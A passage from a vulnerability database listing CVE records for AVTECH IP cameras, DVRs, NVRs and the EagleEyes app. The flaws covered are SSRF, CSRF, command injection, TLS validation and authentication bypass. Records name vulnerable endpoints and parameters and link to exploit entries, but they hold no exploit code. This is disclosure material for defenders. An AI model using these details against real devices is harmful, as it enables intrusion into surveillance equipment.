},
{
"status": "affected",
"version": "1027-1014-1015-1009"
},
{
"status": "affected",
"version": "S968-S968-S968-S968"
},
{
"status": "affected",
"version": "V171P-V171P-V171P-V171P"
},
{
"status": "affected",
"version": "V189-V189-V189-V189"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Gergely Eberhardt (SEARCH-LAB.hu)"
}
],
"datePublic": "2016-10-11T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "A server-side request forgery vulnerability exists in multiple firmware versions of AVTECH DVR devices that exposes the \u003ccode\u003e/cgi-bin/nobody/Search.cgi?action=cgi_query\u003c/code\u003e endpoint without authentication. An attacker can manipulate the \u003ccode\u003eip\u003c/code\u003e, \u003ccode\u003eport\u003c/code\u003e, and \u003ccode\u003equeryb64str\u003c/code\u003e parameters to make arbitrary HTTP requests from the DVR to internal or external systems, potentially exposing sensitive data or interacting with internal services."
}
],
"value": "A server-side request forgery vulnerability exists in multiple firmware versions of AVTECH DVR devices that exposes the /cgi-bin/nobody/Search.cgi?action=cgi_query endpoint without authentication. An attacker can manipulate the ip, port, and queryb64str parameters to make arbitrary HTTP requests from the DVR to internal or external systems, potentially exposing sensitive data or interacting with internal services."
}
],
"impacts": [
{
"capecId": "CAPEC-664",
"descriptions": [
{
"lang": "en",
"value": "CAPEC-664 Server Side Request Forgery"
}
]
}
],
"metrics": [
{
"cvssV4_0": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 6.9,
"baseSeverity": "MEDIUM",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "LOW",
"subConfidentialityImpact": "LOW",
"subIntegrityImpact": "LOW",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "NONE",
"vulnIntegrityImpact": "LOW",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-918",
"description": "CWE-918 Server-Side Request Forgery (SSRF)",
"lang": "en",
"type": "CWE"
}
]
},
{
"descriptions": [
{
"cweId": "CWE-200",
"description": "CWE-200 Exposure of Sensitive Information to an Unauthorized Actor",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-04-07T14:09:14.685Z",
"orgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"shortName": "VulnCheck"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://www.exploit-db.com/exploits/40500"
},
{
"tags": [
"product"
],
"url": "https://avtech.com/"
},
{
"tags": [
"third-party-advisory",
"technical-description"
],
"url": "https://web.archive.org/web/20240810225729/https://www.search-lab.hu/advisories/126-AVTech-devices-multiple-vulnerabilities"
},
{
"tags": [
"exploit"
],
"url": "https://web.archive.org/web/20161029201749/https://github.com/ebux/AVTECH"
},
{
"tags": [
"third-party-advisory"
],
"url": "https://vulncheck.com/advisories/avtech-ipcamera-nvr-dvr-mulitple-vulns"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "AVTECH DVR Devices Server-Side Request Forgery",
"x_generator": {
"engine": "Vulnogram 0.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"assignerShortName": "VulnCheck",
"cveId": "CVE-2025-34051",
"datePublished": "2025-07-01T14:44:22.913Z",
"dateReserved": "2025-04-15T19:15:22.548Z",
"dateUpdated": "2026-04-07T14:09:14.685Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-34050 (GCVE-0-2025-34050)
Vulnerability from cvelistv5 – Published: 2025-07-01 14:42 – Updated: 2026-04-07 14:09
VLAI
Title
AVTECH IP Camera, DVR, and NVR Devices Cross-Site Request Forgery
Summary
A cross-site request forgery (CSRF) vulnerability exists in the web interface of AVTECH IP camera, DVR, and NVR devices. An attacker can craft malicious requests that, when executed in the context of an authenticated user’s browser session, allow unauthorized changes to the device configuration without user interaction.
Severity
SSVC
Exploitation: poc
Automatable: no
Technical Impact: partial
CISA Coordinator (v2.0.3)
CWE
- CWE-352 - Cross-Site Request Forgery (CSRF)
Assigner
References
5 references
| URL | Tags |
|---|---|
| https://www.exploit-db.com/exploits/40500 | exploit |
| https://avtech.com/ | product |
| https://web.archive.org/web/20240810225729/https:… | third-party-advisorytechnical-description |
| https://web.archive.org/web/20161029201749/https:… | exploit |
| https://vulncheck.com/advisories/avtech-ipcamera-… | third-party-advisory |
Impacted products
3 products
| Vendor | Product | Version | |
|---|---|---|---|
| AVTECH | IP cameras |
Affected:
0
|
|
| AVTECH | DVR devices |
Affected:
0
|
|
| AVTECH | NVR devices |
Affected:
0
|
Date Public
2016-10-11 00:00
Credits
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-34050",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-07-01T18:44:55.395830Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-07-01T18:45:06.703Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"modules": [
"Web Management Interface (configuration endpoints)"
],
"product": "IP cameras",
"vendor": "AVTECH",
"versions": [
{
"status": "affected",
"version": "0"
}
]
},
{
"defaultStatus": "unaffected",
"modules": [
"Web Management Interface (configuration endpoints)"
],
"product": "DVR devices",
"vendor": "AVTECH",
"versions": [
{
"status": "affected",
"version": "0"
}
]
},
{
"defaultStatus": "unaffected",
"modules": [
"Web Management Interface (configuration endpoints)"
],
"product": "NVR devices",
"vendor": "AVTECH",
"versions": [
{
"status": "affected",
"version": "0"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Gergely Eberhardt (SEARCH-LAB.hu)"
}
],
"datePublic": "2016-10-11T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "A\u0026nbsp;cross-site request forgery (CSRF) vulnerability exists in the web interface of AVTECH IP camera, DVR, and NVR devices. An attacker can craft malicious requests that, when executed in the context of an authenticated user\u2019s browser session, allow unauthorized changes to the device configuration without user interaction."
}
],
"value": "A\u00a0cross-site request forgery (CSRF) vulnerability exists in the web interface of AVTECH IP camera, DVR, and NVR devices. An attacker can craft malicious requests that, when executed in the context of an authenticated user\u2019s browser session, allow unauthorized changes to the device configuration without user interaction."
}
],
"impacts": [
{
"capecId": "CAPEC-62",
"descriptions": [
{
"lang": "en",
"value": "CAPEC-62 Cross Site Request Forgery"
}
]
}
],
"metrics": [
{
"cvssV4_0": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 5.1,
"baseSeverity": "MEDIUM",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "ACTIVE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "NONE",
"vulnIntegrityImpact": "LOW",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-352",
"description": "CWE-352 Cross-Site Request Forgery (CSRF)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-04-07T14:09:13.996Z",
"orgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"shortName": "VulnCheck"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://www.exploit-db.com/exploits/40500"
},
{
"tags": [
"product"
],
"url": "https://avtech.com/"
},
{
"tags": [
"third-party-advisory",
"technical-description"
],
"url": "https://web.archive.org/web/20240810225729/https://www.search-lab.hu/advisories/126-AVTech-devices-multiple-vulnerabilities"
},
{
"tags": [
"exploit"
],
"url": "https://web.archive.org/web/20161029201749/https://github.com/ebux/AVTECH"
},
{
"tags": [
"third-party-advisory"
],
"url": "https://vulncheck.com/advisories/avtech-ipcamera-nvr-dvr-mulitple-vulns"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "AVTECH IP Camera, DVR, and NVR Devices Cross-Site Request Forgery",
"x_generator": {
"engine": "Vulnogram 0.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"assignerShortName": "VulnCheck",
"cveId": "CVE-2025-34050",
"datePublished": "2025-07-01T14:42:57.143Z",
"dateReserved": "2025-04-15T19:15:22.548Z",
"dateUpdated": "2026-04-07T14:09:13.996Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2024-7029 (GCVE-0-2024-7029)
Vulnerability from cvelistv5 – Published: 2024-08-02 15:08 – Updated: 2025-01-09 19:22
VLAI
KEVIntel
Title
Command Injection in AVTech AVM1203 (IP Camera)
Summary
Commands can be injected over the network and executed without authentication.
Severity
SSVC
Exploitation: none
Automatable: no
Technical Impact: total
CISA Coordinator (v2.0.3)
CWE
- CWE-77 - Improper Neutralization of Special Elements used in a Command ('Command Injection')
Assigner
References
2 references
| URL | Tags |
|---|---|
| https://www.cisa.gov/news-events/ics-advisories/i… | government-resource |
| https://www.akamai.com/blog/security-research/202… |
Impacted products
2 products
| Vendor | Product | Version | |
|---|---|---|---|
| AVTech | AVM1203 (IP Camera) |
Affected:
0 , ≤ FullImg-1023-1007-1011-1009
(custom)
|
|
| avtec | avm1203\/ipcamera\/ |
Affected:
0 , ≤ fullImg-1023-1007-1011-1009
(custom)
cpe:2.3:a:avtec:avm1203\/ipcamera\/:*:*:*:*:*:*:*:* |
Credits
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:a:avtec:avm1203\\/ipcamera\\/:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "avm1203\\/ipcamera\\/",
"vendor": "avtec",
"versions": [
{
"lessThanOrEqual": "fullImg-1023-1007-1011-1009",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-7029",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-08-05T15:18:01.228848Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-01-09T19:22:30.663Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "AVM1203 (IP Camera)",
"vendor": "AVTech",
"versions": [
{
"lessThanOrEqual": "FullImg-1023-1007-1011-1009",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Larry Cashdollar and Aline Eliovich of Akamai Technologies reported this vulnerability to CISA."
},
{
"lang": "en",
"type": "finder",
"value": "An anonymous third-party organization confirmed Akamai\u0027s report and identified specific affected products and firmware versions."
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003eCommands can be injected over the network and executed without authentication.\u003c/span\u003e"
}
],
"value": "Commands can be injected over the network and executed without authentication."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
},
{
"cvssV4_0": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 8.7,
"baseSeverity": "HIGH",
"privilegesRequired": "LOW",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "HIGH",
"vulnConfidentialityImpact": "HIGH",
"vulnIntegrityImpact": "HIGH",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-77",
"description": "CWE-77 Improper Neutralization of Special Elements used in a Command (\u0027Command Injection\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-09-25T22:56:58.061Z",
"orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6",
"shortName": "icscert"
},
"references": [
{
"tags": [
"government-resource"
],
"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-24-214-07"
},
{
"url": "https://www.akamai.com/blog/security-research/2024-corona-mirai-botnet-infects-zero-day-sirt"
}
],
"solutions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003eAVTECH SECURITY Corporation has not responded to requests to work with CISA to mitigate these vulnerabilities. Users of the affected products are encouraged to contact \u003c/span\u003e\u003ca target=\"_blank\" rel=\"nofollow\" href=\"https://www.avtech.com.tw/ContactUs.aspx\"\u003eAVTECH\u003c/a\u003e\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003e\u0026nbsp;for additional information.\u003c/span\u003e\n\n\u003cbr\u003e"
}
],
"value": "AVTECH SECURITY Corporation has not responded to requests to work with CISA to mitigate these vulnerabilities. Users of the affected products are encouraged to contact AVTECH https://www.avtech.com.tw/ContactUs.aspx \u00a0for additional information."
}
],
"source": {
"advisory": "ICSA-24-214-07",
"discovery": "EXTERNAL"
},
"title": "Command Injection in AVTech AVM1203 (IP Camera)",
"x_generator": {
"engine": "Vulnogram 0.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6",
"assignerShortName": "icscert",
"cveId": "CVE-2024-7029",
"datePublished": "2024-08-02T15:08:35.991Z",
"dateReserved": "2024-07-23T16:19:10.205Z",
"dateUpdated": "2025-01-09T19:22:30.663Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2025-50944 (GCVE-0-2025-50944)
Vulnerability from nvd – Published: 2025-09-15 00:00 – Updated: 2025-09-15 14:26
VLAI
Summary
An issue was discovered in the method push.lite.avtech.com.MySSLSocketFactoryNew.checkServerTrusted in AVTECH EagleEyes 2.0.0. The custom X509TrustManager used in checkServerTrusted only checks the certificate's expiration date, skipping proper TLS chain validation.
Severity
8.8 (High)
SSVC
Exploitation: poc
Automatable: no
Technical Impact: total
CISA Coordinator (v2.0.3)
CWE
- n/a
- CWE-295 - Improper Certificate Validation
Assigner
References
2 references
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2025-50944",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-09-15T14:23:22.625287Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-295",
"description": "CWE-295 Improper Certificate Validation",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-09-15T14:26:24.185Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "An issue was discovered in the method push.lite.avtech.com.MySSLSocketFactoryNew.checkServerTrusted in AVTECH EagleEyes 2.0.0. The custom X509TrustManager used in checkServerTrusted only checks the certificate\u0027s expiration date, skipping proper TLS chain validation."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-09-15T13:57:13.448Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"url": "https://shinycolumn.notion.site/eagleeyes-lite"
},
{
"url": "https://github.com/shinyColumn/CVE-2025-50944"
}
]
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2025-50944",
"datePublished": "2025-09-15T00:00:00.000Z",
"dateReserved": "2025-06-16T00:00:00.000Z",
"dateUpdated": "2025-09-15T14:26:24.185Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2025-46408 (GCVE-0-2025-46408)
Vulnerability from nvd – Published: 2025-09-15 00:00 – Updated: 2025-09-17 13:40
VLAI
Summary
An issue was discovered in the methods push.lite.avtech.com.AvtechLib.GetHttpsResponse and push.lite.avtech.com.Push_HttpService.getNewHttpClient in AVTECH EagleEyes 2.0.0. The methods set ALLOW_ALL_HOSTNAME_VERIFIER, bypassing domain validation.
Severity
9.8 (Critical)
SSVC
Exploitation: poc
Automatable: yes
Technical Impact: total
CISA Coordinator (v2.0.3)
CWE
- n/a
- CWE-297 - Improper Validation of Certificate with Host Mismatch
Assigner
References
1 reference
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2025-46408",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-09-17T13:40:02.640558Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-297",
"description": "CWE-297 Improper Validation of Certificate with Host Mismatch",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-09-17T13:40:32.675Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://github.com/shinyColumn/CVE-2025-46408"
}
],
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "An issue was discovered in the methods push.lite.avtech.com.AvtechLib.GetHttpsResponse and push.lite.avtech.com.Push_HttpService.getNewHttpClient in AVTECH EagleEyes 2.0.0. The methods set ALLOW_ALL_HOSTNAME_VERIFIER, bypassing domain validation."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-09-15T14:09:17.865Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"url": "https://github.com/shinyColumn/CVE-2025-46408"
}
]
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2025-46408",
"datePublished": "2025-09-15T00:00:00.000Z",
"dateReserved": "2025-07-11T00:00:00.000Z",
"dateUpdated": "2025-09-17T13:40:32.675Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2025-34066 (GCVE-0-2025-34066)
Vulnerability from nvd – Published: 2025-07-01 14:47 – Updated: 2026-04-07 14:09
VLAI
Title
AVTECH IP camera, DVR, and NVR Devices Unauthenticated Information Disclosure
Summary
An improper certificate validation vulnerability exists in AVTECH IP cameras, DVRs, and NVRs due to the use of wget with --no-check-certificate in scripts like SyncCloudAccount.sh and SyncPermit.sh. This exposes HTTPS communications to man-in-the-middle (MITM) attacks.
Severity
SSVC
Exploitation: poc
Automatable: no
Technical Impact: partial
CISA Coordinator (v2.0.3)
CWE
- CWE-295 - Improper Certificate Validation
Assigner
References
5 references
| URL | Tags |
|---|---|
| https://www.exploit-db.com/exploits/40500 | exploit |
| https://avtech.com/ | product |
| https://web.archive.org/web/20240810225729/https:… | third-party-advisorytechnical-description |
| https://web.archive.org/web/20161029201749/https:… | exploit |
| https://vulncheck.com/advisories/avtech-ipcamera-… | third-party-advisory |
Impacted products
3 products
| Vendor | Product | Version | |
|---|---|---|---|
| AVTECH | IP cameras |
Affected:
0
|
|
| AVTECH | DVR devices |
Affected:
0
|
|
| AVTECH | NVR devices |
Affected:
0
|
Date Public
2016-10-11 00:00
Credits
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-34066",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-07-01T18:37:09.538771Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-07-01T18:37:36.761Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"modules": [
"Cloud sync shell scripts",
"--no-check-certificate (hardcoded)"
],
"product": "IP cameras",
"vendor": "AVTECH",
"versions": [
{
"status": "affected",
"version": "0"
}
]
},
{
"defaultStatus": "unaffected",
"modules": [
"Cloud sync shell scripts",
"--no-check-certificate (hardcoded)"
],
"product": "DVR devices",
"vendor": "AVTECH",
"versions": [
{
"status": "affected",
"version": "0"
}
]
},
{
"defaultStatus": "unaffected",
"modules": [
"Cloud sync shell scripts",
"--no-check-certificate (hardcoded)"
],
"product": "NVR devices",
"vendor": "AVTECH",
"versions": [
{
"status": "affected",
"version": "0"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Gergely Eberhardt (SEARCH-LAB.hu)"
}
],
"datePublic": "2016-10-11T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "An improper certificate validation vulnerability exists in AVTECH IP cameras, DVRs, and NVRs due to the use of wget with --no-check-certificate in scripts like SyncCloudAccount.sh and SyncPermit.sh. This exposes HTTPS communications to man-in-the-middle (MITM) attacks."
}
],
"value": "An improper certificate validation vulnerability exists in AVTECH IP cameras, DVRs, and NVRs due to the use of wget with --no-check-certificate in scripts like SyncCloudAccount.sh and SyncPermit.sh. This exposes HTTPS communications to man-in-the-middle (MITM) attacks."
}
],
"impacts": [
{
"capecId": "CAPEC-94",
"descriptions": [
{
"lang": "en",
"value": "CAPEC-94 Adversary in the Middle (AiTM)"
}
]
}
],
"metrics": [
{
"cvssV4_0": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "PRESENT",
"attackVector": "NETWORK",
"baseScore": 8.3,
"baseSeverity": "HIGH",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:L/VA:L/SC:N/SI:N/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "LOW",
"vulnConfidentialityImpact": "HIGH",
"vulnIntegrityImpact": "LOW",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-295",
"description": "CWE-295 Improper Certificate Validation",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-04-07T14:09:19.390Z",
"orgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"shortName": "VulnCheck"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://www.exploit-db.com/exploits/40500"
},
{
"tags": [
"product"
],
"url": "https://avtech.com/"
},
{
"tags": [
"third-party-advisory",
"technical-description"
],
"url": "https://web.archive.org/web/20240810225729/https://www.search-lab.hu/advisories/126-AVTech-devices-multiple-vulnerabilities"
},
{
"tags": [
"exploit"
],
"url": "https://web.archive.org/web/20161029201749/https://github.com/ebux/AVTECH"
},
{
"tags": [
"third-party-advisory"
],
"url": "https://vulncheck.com/advisories/avtech-ipcamera-nvr-dvr-mulitple-vulns"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "AVTECH IP camera, DVR, and NVR Devices Unauthenticated Information Disclosure",
"x_generator": {
"engine": "Vulnogram 0.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"assignerShortName": "VulnCheck",
"cveId": "CVE-2025-34066",
"datePublished": "2025-07-01T14:47:44.573Z",
"dateReserved": "2025-04-15T19:15:22.549Z",
"dateUpdated": "2026-04-07T14:09:19.390Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-34065 (GCVE-0-2025-34065)
Vulnerability from nvd – Published: 2025-07-01 14:47 – Updated: 2026-04-07 14:09
VLAI
Title
AVTECH IP camera, DVR, and NVR Devices Authentication Bypass via /nobody URL Path
Summary
An authentication bypass vulnerability exists in AVTECH IP camera, DVR, and NVR devices’ streamd web server. The strstr() function allows unauthenticated access to any request containing "/nobody" in the URL, bypassing login controls.
Severity
SSVC
Exploitation: poc
Automatable: no
Technical Impact: partial
CISA Coordinator (v2.0.3)
CWE
- CWE-290 - Authentication Bypass by Spoofing
Assigner
References
5 references
| URL | Tags |
|---|---|
| https://www.exploit-db.com/exploits/40500 | exploit |
| https://avtech.com/ | product |
| https://web.archive.org/web/20240810225729/https:… | third-party-advisorytechnical-description |
| https://web.archive.org/web/20161029201749/https:… | exploit |
| https://vulncheck.com/advisories/avtech-ipcamera-… | third-party-advisory |
Impacted products
1 product
| Vendor | Product | Version | |
|---|---|---|---|
| AVTECH | IP camera, DVR, and NVR Devices |
Affected:
1000-1000-1000-1000
